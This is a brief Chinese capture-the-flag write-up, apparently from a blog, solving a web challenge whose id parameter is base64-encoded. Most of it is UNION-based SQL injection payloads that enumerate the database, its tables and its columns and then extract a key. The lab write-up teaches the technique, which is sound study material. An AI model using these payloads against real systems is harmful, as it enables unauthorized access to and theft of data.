解题方向上明说了是base64编码,通过链接发现id后面的值确实被加密了,通过base64解码看看
base64编码解码
对id后面的值进行了加密,那么好办了,我们先猜测列的数量
id=1 order by 1对id后面的值进行base64加密
一直测试发现等于3会报错,那么说明有两列。
先爆库看看 -1 union select database(),2
当前的库是test,我们直接看看这个库中有哪些表
-1 union select group_concat(table_name),2 from information_schema.tables where table_schema=‘test’
只有一张表data,获取data里面列
-1 union select group_concat(column_name),2 from information_schema.columns where table_name=‘data’
thekey看着就像答案,直接给捞出来看看
-1 union select thekey,2 from data
答案直接提交,成了
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)